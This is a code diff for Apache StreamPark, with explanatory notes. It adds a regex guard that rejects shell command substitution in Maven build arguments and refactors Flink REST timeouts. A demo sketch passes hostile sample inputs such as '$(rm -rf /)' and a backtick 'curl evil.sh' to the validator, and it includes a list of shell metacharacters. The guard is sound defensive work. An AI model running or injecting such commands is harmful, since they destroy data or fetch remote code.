diff --git a/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java b/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java
index 882d94f19f..3ccbdac925 100644
--- a/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java
+++ b/streampark-console/streampark-console-service/src/main/java/org/apache/streampark/console/core/entity/Project.java
@@ -46,6 +46,8 @@
 import java.util.ArrayList;
 import java.util.Date;
 import java.util.List;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
 import java.util.stream.Collectors;
 
 @Slf4j
@@ -210,39 +212,49 @@ public String getMavenArgs() {
     StringBuilder cmdBuffer = new StringBuilder(mvn).append(" clean package -DskipTests ");
 
     if (StringUtils.isNotBlank(this.buildArgs)) {
-      List<String> dangerArgs = getDangerArgs(this.buildArgs);
-      if (dangerArgs.isEmpty()) {
+      String dangerArgs = getDangerArgs(this.buildArgs);
+      if (dangerArgs == null) {
         cmdBuffer.append(this.buildArgs.trim());
       } else {
         throw new IllegalArgumentException(
             String.format(
-                "Invalid build args, dangerous operation symbol detected: %s, in your buildArgs: %s",
-                dangerArgs.stream().collect(Collectors.joining(",")), this.buildArgs));
+                "Invalid maven argument, dangerous args: %s, in your buildArgs: %s",
+                dangerArgs, this.buildArgs));
       }
     }
 
     String setting = InternalConfigHolder.get(CommonConfig.MAVEN_SETTINGS_PATH());
     if (StringUtils.isNotBlank(setting)) {
-      List<String> dangerArgs = getDangerArgs(setting);
-      if (dangerArgs.isEmpty()) {
+      String dangerArgs = getDangerArgs(setting);
+      if (dangerArgs == null) {
         File file = new File(setting);
         if (file.exists() && file.isFile()) {
           cmdBuffer.append(" --settings ").append(setting);
         } else {
           throw new IllegalArgumentException(
-              String.format("Invalid maven setting path, %s no exists or not file", setting));
+              String.format("Invalid maven-setting file path, %s no exists or not file", setting));
         }
       } else {
         throw new IllegalArgumentException(
             String.format(
-                "Invalid maven setting path, dangerous operation symbol detected: %s, in your maven setting path: %s",
-                dangerArgs.stream().collect(Collectors.joining(",")), setting));
+                "Invalid maven-setting file path, dangerous args: %s, in your maven setting path: %s",
+                dangerArgs, setting));
       }
     }
     return cmdBuffer.toString();
   }
 
-  private List<String> getDangerArgs(String param) {
+  private String getDangerArgs(String param) {
+    Pattern pattern = Pattern.compile("(`.*?`)|(\\$\\((.*?)\\))");
+    Matcher matcher = pattern.matcher(param);
+    if (matcher.find()) {
+      String dangerArgs = matcher.group(1);
+      if (dangerArgs == null) {
+        dangerArgs = matcher.group(2);
+      }
+      return dangerArgs;
+    }
+
     String[] args = param.split("\\s+");
     List<String> dangerArgs = new ArrayList<>();
     for (String arg : args) {
@@ -263,7 +275,10 @@ private List<String> getDangerArgs(String param) {
         }
       }
     }
-    return dangerArgs;
+    if (!dangerArgs.isEmpty()) {
+      return dangerArgs.stream().collect(Collectors.joining(","));
+    }
+    return null;
   }
 
   @JsonIgnore
diff --git a/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala b/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala
index e7d673628f..63d5e8c64d 100644
--- a/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala
+++ b/streampark-flink/streampark-flink-client/streampark-flink-client-core/src/main/scala/org/apache/streampark/flink/client/tool/FlinkSessionClientHelper.scala
@@ -59,8 +59,8 @@ object FlinkSessionSubmitHelper extends Logger {
     // upload flink-job jar
     val uploadResult = Request
       .post(s"$jmRestUrl/jars/upload")
-      .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-      .responseTimeout(Timeout.ofSeconds(60))
+      .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+      .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
       .body(
         MultipartEntityBuilder
           .create()
@@ -90,8 +90,8 @@ object FlinkSessionSubmitHelper extends Logger {
     // refer to https://ci.apache.org/projects/flink/flink-docs-stable/docs/ops/rest_api/#jars-upload
     val resp = Request
       .post(s"$jmRestUrl/jars/${jarUploadResponse.jarId}/run")
-      .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-      .responseTimeout(Timeout.ofSeconds(60))
+      .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+      .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
       .body(new StringEntity(Serialization.write(new JarRunRequest(flinkConfig))))
       .execute
       .returnContent()
diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala
index d10f81b9f0..916096f259 100644
--- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala
+++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/KubernetesRetriever.scala
@@ -31,22 +31,22 @@ import org.apache.flink.client.program.ClusterClient
 import org.apache.flink.configuration.{Configuration, DeploymentOptions, RestOptions}
 import org.apache.flink.kubernetes.KubernetesClusterDescriptor
 import org.apache.flink.kubernetes.configuration.KubernetesConfigOptions
+import org.apache.hc.core5.util.Timeout
 
 import javax.annotation.Nullable
 
-import java.time.Duration
-
 import scala.collection.JavaConverters._
 import scala.util.{Failure, Success, Try}
 
 object KubernetesRetriever extends Logger {
 
   // see org.apache.flink.client.cli.ClientOptions.CLIENT_TIMEOUT}
-  val FLINK_CLIENT_TIMEOUT_SEC = 60L
+  val FLINK_CLIENT_TIMEOUT_SEC: Timeout =
+    Timeout.ofMilliseconds(ClientOptions.CLIENT_TIMEOUT.defaultValue().toMillis)
+
   // see org.apache.flink.configuration.RestOptions.AWAIT_LEADER_TIMEOUT
-  val FLINK_REST_AWAIT_TIMEOUT_SEC = 30L
-  // see org.apache.flink.configuration.RestOptions.RETRY_MAX_ATTEMPTS
-  val FLINK_REST_RETRY_MAX_ATTEMPTS = 30
+  val FLINK_REST_AWAIT_TIMEOUT_SEC: Timeout =
+    Timeout.ofMilliseconds(RestOptions.AWAIT_LEADER_TIMEOUT.defaultValue())
 
   /** get new KubernetesClient */
   @throws(classOf[KubernetesClientException])
@@ -70,9 +70,11 @@ object KubernetesRetriever extends Logger {
     val flinkConfig = new Configuration()
     flinkConfig.setString(DeploymentOptions.TARGET, executeMode.toString)
     flinkConfig.setString(KubernetesConfigOptions.CLUSTER_ID, clusterId)
-    flinkConfig.set(ClientOptions.CLIENT_TIMEOUT, Duration.ofSeconds(FLINK_CLIENT_TIMEOUT_SEC))
-    flinkConfig.setLong(RestOptions.AWAIT_LEADER_TIMEOUT, FLINK_REST_AWAIT_TIMEOUT_SEC * 1000)
-    flinkConfig.setInteger(RestOptions.RETRY_MAX_ATTEMPTS, FLINK_REST_RETRY_MAX_ATTEMPTS)
+    flinkConfig.set(ClientOptions.CLIENT_TIMEOUT, ClientOptions.CLIENT_TIMEOUT.defaultValue())
+    flinkConfig.set(
+      RestOptions.AWAIT_LEADER_TIMEOUT,
+      RestOptions.AWAIT_LEADER_TIMEOUT.defaultValue())
+    flinkConfig.set(RestOptions.RETRY_MAX_ATTEMPTS, RestOptions.RETRY_MAX_ATTEMPTS.defaultValue())
     if (Try(namespace.isEmpty).getOrElse(true)) {
       flinkConfig.setString(
         KubernetesConfigOptions.NAMESPACE,
diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala
index 5ac00db541..a35da009c5 100644
--- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala
+++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkCheckpointWatcher.scala
@@ -115,8 +115,8 @@ class FlinkCheckpointWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.def
       Checkpoint.as(
         Request
           .get(s"$flinkJmRestUrl/jobs/${trackId.jobId}/checkpoints")
-          .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-          .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC))
+          .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+          .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
          .execute
          .returnContent
          .asString(StandardCharsets.UTF_8)) match {
diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala
index 7dbfcfd0a0..927ffc01d4 100644
--- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala
+++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkJobStatusWatcher.scala
@@ -266,8 +266,8 @@ class FlinkJobStatusWatcher(conf: JobStatusWatcherConfig = JobStatusWatcherConfi
     val jobDetails = JobDetails.as(
       Request
         .get(s"$restUrl/jobs/overview")
-        .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-        .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC))
+        .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+        .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
         .execute
         .returnContent()
         .asString(StandardCharsets.UTF_8))
diff --git a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala
index 8fc80a33a3..7a57063bd5 100644
--- a/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala
+++ b/streampark-flink/streampark-flink-kubernetes/src/main/scala/org/apache/streampark/flink/kubernetes/watcher/FlinkMetricsWatcher.scala
@@ -127,8 +127,8 @@ class FlinkMetricWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.default
         .as(
           Request
             .get(s"$flinkJmRestUrl/overview")
-            .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-            .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC))
+            .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+            .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
             .execute
             .returnContent
             .asString(StandardCharsets.UTF_8))
@@ -140,8 +140,8 @@ class FlinkMetricWatcher(conf: MetricWatcherConfig = MetricWatcherConfig.default
         .as(
           Request
             .get(s"$flinkJmRestUrl/jobmanager/config")
-            .connectTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC))
-            .responseTimeout(Timeout.ofSeconds(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC))
+            .connectTimeout(KubernetesRetriever.FLINK_REST_AWAIT_TIMEOUT_SEC)
+            .responseTimeout(KubernetesRetriever.FLINK_CLIENT_TIMEOUT_SEC)
             .execute
             .returnContent
             .asString(StandardCharsets.UTF_8))
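Note on the `Project.java` change: the new `getDangerArgs` contract is "return the first dangerous fragment, or null when the argument string looks safe", with a regex pre-check for backtick and `$(...)` command substitution before the existing token scan. The following is a minimal, self-contained sketch of that flow, not the project class itself; the `DANGER_TOKENS` list is a placeholder for the token check that lives in the unchanged part of the method.

```java
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Standalone illustration of the validation flow in getMavenArgs()/getDangerArgs().
public class MavenArgsGuard {

  // Same pattern as the patch: group 1 catches `...` backtick substitution,
  // group 2 catches $(...) command substitution.
  private static final Pattern SHELL_SUBSTITUTION = Pattern.compile("(`.*?`)|(\\$\\((.*?)\\))");

  // Placeholder blacklist: the real token check is in the unchanged tail of getDangerArgs().
  private static final List<String> DANGER_TOKENS = Arrays.asList(";", "|", "&", ">", "<");

  /** Returns the first dangerous fragment found, or null when the arguments look safe. */
  static String findDangerArg(String param) {
    Matcher matcher = SHELL_SUBSTITUTION.matcher(param);
    if (matcher.find()) {
      // group(1) is non-null for backticks, group(2) for $(...)
      return matcher.group(1) != null ? matcher.group(1) : matcher.group(2);
    }
    for (String arg : param.split("\\s+")) {
      for (String token : DANGER_TOKENS) {
        if (arg.contains(token)) {
          return arg;
        }
      }
    }
    return null;
  }

  public static void main(String[] args) {
    System.out.println(findDangerArg("-Pprod -Drevision=1.0"));      // null -> accepted
    System.out.println(findDangerArg("-Dcmd=$(rm -rf /) -Pprod"));   // "$(rm -rf /)" -> rejected
    System.out.println(findDangerArg("`curl evil.sh` -DskipTests")); // "`curl evil.sh`" -> rejected
  }
}
```

Returning the joined offending tokens (or null) also lets the caller put the exact fragment into the exception message without re-joining a list at every call site.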
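On the Kubernetes side, every call site follows the same pattern: the HttpClient5 `Timeout` values are now derived from Flink's own defaults (`RestOptions.AWAIT_LEADER_TIMEOUT`, `ClientOptions.CLIENT_TIMEOUT`) instead of hard-coded 30s/60s literals, so a Flink upgrade adjusts them in one place. A hedged sketch of that derivation, assuming `flink-clients` and `httpclient5-fluent` are on the classpath and that the JobManager URL below is only an illustrative value:

```java
import java.nio.charset.StandardCharsets;

import org.apache.flink.client.cli.ClientOptions;
import org.apache.flink.configuration.RestOptions;
import org.apache.hc.client5.http.fluent.Request;
import org.apache.hc.core5.util.Timeout;

// Illustrative only: mirrors how the patch builds connect/response timeouts from Flink defaults.
public class RestTimeoutsExample {

  // REST leader-await timeout: RestOptions.AWAIT_LEADER_TIMEOUT default is in milliseconds.
  static final Timeout CONNECT_TIMEOUT =
      Timeout.ofMilliseconds(RestOptions.AWAIT_LEADER_TIMEOUT.defaultValue());

  // Client timeout: ClientOptions.CLIENT_TIMEOUT default is a java.time.Duration.
  static final Timeout RESPONSE_TIMEOUT =
      Timeout.ofMilliseconds(ClientOptions.CLIENT_TIMEOUT.defaultValue().toMillis());

  public static void main(String[] args) throws Exception {
    // Hypothetical JobManager REST endpoint, for demonstration only.
    String jmRestUrl = "http://localhost:8081";
    String overview =
        Request.get(jmRestUrl + "/overview")
            .connectTimeout(CONNECT_TIMEOUT)
            .responseTimeout(RESPONSE_TIMEOUT)
            .execute()
            .returnContent()
            .asString(StandardCharsets.UTF_8);
    System.out.println(overview);
  }
}
```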